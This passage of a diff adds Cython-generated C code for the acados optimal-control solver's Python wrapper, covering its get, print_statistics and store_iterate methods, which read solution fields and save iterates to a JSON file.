(unlikely(!__pyx_t_1)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_zeros); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dims); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = PyTuple_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_7}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 268, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 268, __pyx_L1_error) + __pyx_t_9 = ((PyArrayObject *)__pyx_t_3); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_9, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 268, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_9 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":270 + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, out.data) # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_10 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_10) && PyErr_Occurred())) __PYX_ERR(0, 270, __pyx_L1_error) + __pyx_t_11 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_11 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 270, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":269 + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, out.data) + * + */ + ocp_nlp_out_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_10, ((void *)__pyx_t_11)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":272 + * self.nlp_dims, self.nlp_out, stage, field, out.data) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_out_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics, "\n prints statistics of previous solver run as a table:\n - iter: iteration number\n - res_stat: stationarity residual\n - res_eq: residual wrt equality constraints (dynamics)\n - res_ineq: residual wrt inequality constraints (constraints)\n - res_comp: residual wrt complementarity conditions\n - qp_stat: status of QP solver\n - qp_iter: number of QP iterations\n - qp_res_stat: stationarity residual of the last QP solution\n - qp_res_eq: residual wrt equality constraints (dynamics) of the last QP solution\n - qp_res_ineq: residual wrt inequality constraints (constraints) of the last QP solution\n - qp_res_comp: residual wrt complementarity conditions of the last QP solution\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics = {"print_statistics", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("print_statistics (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("print_statistics", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "print_statistics", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("print_statistics", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":290 + * - qp_res_comp: residual wrt complementarity conditions of the last QP solution + * """ + * acados_solver.acados_print_stats(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + lat_acados_print_stats(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate, "\n Stores the current iterate of the ocp solver in a json file.\n\n :param filename: if not set, use model_name + timestamp + '.json'\n :param overwrite: if false and filename exists add timestamp to filename\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate = {"store_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_filename = 0; + PyObject *__pyx_v_overwrite = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("store_iterate (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_filename,&__pyx_n_s_overwrite,0}; + PyObject* values[2] = {0,0}; + values[0] = ((PyObject *)__pyx_kp_u__14); + values[1] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_filename); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 293, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_overwrite); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 293, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "store_iterate") < 0)) __PYX_ERR(0, 293, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_filename = values[0]; + __pyx_v_overwrite = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("store_iterate", 0, 0, 2, __pyx_nargs); __PYX_ERR(0, 293, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_filename, __pyx_v_overwrite); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":326 + * # save + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) # <<<<<<<<<<<<<< + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda = {"lambda", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_x = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("lambda (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_x,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_x)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 326, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lambda") < 0)) __PYX_ERR(0, 326, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_x = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("lambda", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 326, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate.lambda", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_lambda_funcdef_lambda(__pyx_self, __pyx_v_x); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_lambda_funcdef_lambda(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_x) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("lambda", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_x, __pyx_n_s_tolist); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 326, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_3, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 326, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate.lambda", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename, PyObject *__pyx_v_overwrite) { + PyObject *__pyx_v_json = NULL; + PyObject *__pyx_v_solution = NULL; + PyObject *__pyx_v_i = NULL; + PyObject *__pyx_v_f = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + Py_ssize_t __pyx_t_8; + PyObject *(*__pyx_t_9)(PyObject *); + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + PyObject *__pyx_t_14 = NULL; + PyObject *__pyx_t_15 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("store_iterate", 0); + __Pyx_INCREF(__pyx_v_filename); + + /* "acados_template/acados_ocp_solver_pyx.pyx":300 + * :param overwrite: if false and filename exists add timestamp to filename + * """ + * import json # <<<<<<<<<<<<<< + * if filename == '': + * filename += self.model_name + '_' + 'iterate' + '.json' + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_json, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 300, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_json = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":301 + * """ + * import json + * if filename == '': # <<<<<<<<<<<<<< + * filename += self.model_name + '_' + 'iterate' + '.json' + * + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_filename, __pyx_kp_u__14, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 301, __pyx_L1_error) + if (__pyx_t_2) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":302 + * import json + * if filename == '': + * filename += self.model_name + '_' + 'iterate' + '.json' # <<<<<<<<<<<<<< + * + * if not overwrite: + */ + __pyx_t_1 = __Pyx_PyUnicode_ConcatSafe(__pyx_v_self->model_name, __pyx_n_u__15); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyUnicode_ConcatInPlace(__pyx_t_1, __pyx_n_u_iterate); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyUnicode_ConcatInPlace(__pyx_t_3, __pyx_kp_u_json_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_filename, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":301 + * """ + * import json + * if filename == '': # <<<<<<<<<<<<<< + * filename += self.model_name + '_' + 'iterate' + '.json' + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":304 + * filename += self.model_name + '_' + 'iterate' + '.json' + * + * if not overwrite: # <<<<<<<<<<<<<< + * # append timestamp + * if os.path.isfile(filename): + */ + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_v_overwrite); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 304, __pyx_L1_error) + __pyx_t_4 = (!__pyx_t_2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":306 + * if not overwrite: + * # append timestamp + * if os.path.isfile(filename): # <<<<<<<<<<<<<< + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_os); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_path); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_isfile); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_v_filename}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":307 + * # append timestamp + * if os.path.isfile(filename): + * filename = filename[:-5] # <<<<<<<<<<<<<< + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + * + */ + __pyx_t_3 = __Pyx_PyObject_GetSlice(__pyx_v_filename, 0, -5L, NULL, NULL, &__pyx_slice__16, 0, 1, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 307, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":308 + * if os.path.isfile(filename): + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' # <<<<<<<<<<<<<< + * + * # get iterate: + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_datetime); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_utcnow); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + 